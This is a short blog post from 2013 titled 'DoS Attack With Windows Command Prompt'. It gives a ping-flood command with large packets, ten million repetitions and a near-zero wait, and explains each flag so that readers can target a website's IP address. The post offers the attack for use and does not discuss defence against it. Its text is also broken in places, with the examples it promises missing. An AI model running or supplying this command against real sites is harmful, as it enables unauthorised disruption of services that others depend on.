Friday, 15 February 2013

DoS Attack With Windows Command Prompt

How to Dos a website with just using CMD?

Here are the steps.

1) First find the IP Address of the remote website using the Ping, Tracert, or any other command.
     Open CMD in windows, type

    That should ping the website like this.

     When you have the IP of the website, type this.

     ping SITE-IP -l 65500 -n 10000000 -w 0.00001 
 -n 10000000= the number of DoS attemps.. you can change the value "10000000" with you're desired value u want to attempt attack.

SITE-IP= Replace the text with the ip address of the site u want to be attacked..

-w 0.00001 = It is the waiting time after one ping attack.


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